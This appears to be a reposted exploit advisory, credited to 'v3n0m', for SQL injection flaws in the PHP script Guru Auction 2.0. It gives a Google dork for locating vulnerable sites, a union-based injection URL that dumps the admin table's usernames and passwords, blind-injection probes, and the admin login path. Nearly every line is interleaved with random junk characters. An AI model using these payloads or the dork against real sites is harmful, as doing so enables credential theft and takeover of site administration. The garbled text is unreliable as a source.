Guru Auction 2.0 Multiple SQL Injection Vulnerabilities% D$ ?% E% |! R3 R
9 C( e5 I$ S! z/ ~& W+ l
作者 : v3n0m
) u7 t5 C6 t. P3 k5 x; V' s7 J a应用 : Guru Auction 2.0
3 [) z+ Z8 U n, U5 V( ^: i! S$ H& tPrice : $49& O+ u; E/ I& e- z) ~4 f+ l/ R
Vendor : http://www.guruscript.com/
; a! E6 S4 T2 MGoogle Dork : inurl:subcat.php?cate_id=
0 p0 ^) e5 D/ S: m1 r, p5 c
6 Y% E& a4 _8 ]# j9 o" z+ o( MSQLi p0c:
3 G9 ?6 ^/ H) A! z~~~~~~~~~~
8 R- ^! g8 ^) \: O/ Rhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--4 J$ J# b# ` x" K
* Y. a+ m, y/ W+ I' k$ L& _1 h; {" c
: F1 u3 h6 M$ F5 q% c0 \( w盲注 p0c:
- K) s- J3 }& _) O! t i~~~~~~~~~~# G, k }0 g( h l: @
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
" ^/ i0 B6 U' [- w) R9 bhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
6 a4 n% t. J3 r- i( D+ m0 J
+ G# T7 l* r2 s5 c/ E1 o, l* Y+ n管理登录入口:8 {. F4 Z' g1 j; P& Q) G
~~~~~~~~~~
/ K% t5 A5 d6 M8 [0 P: R Ahttp://domain.tld/[path]/admin/
0 d( h, n. [* Y3 D/ e |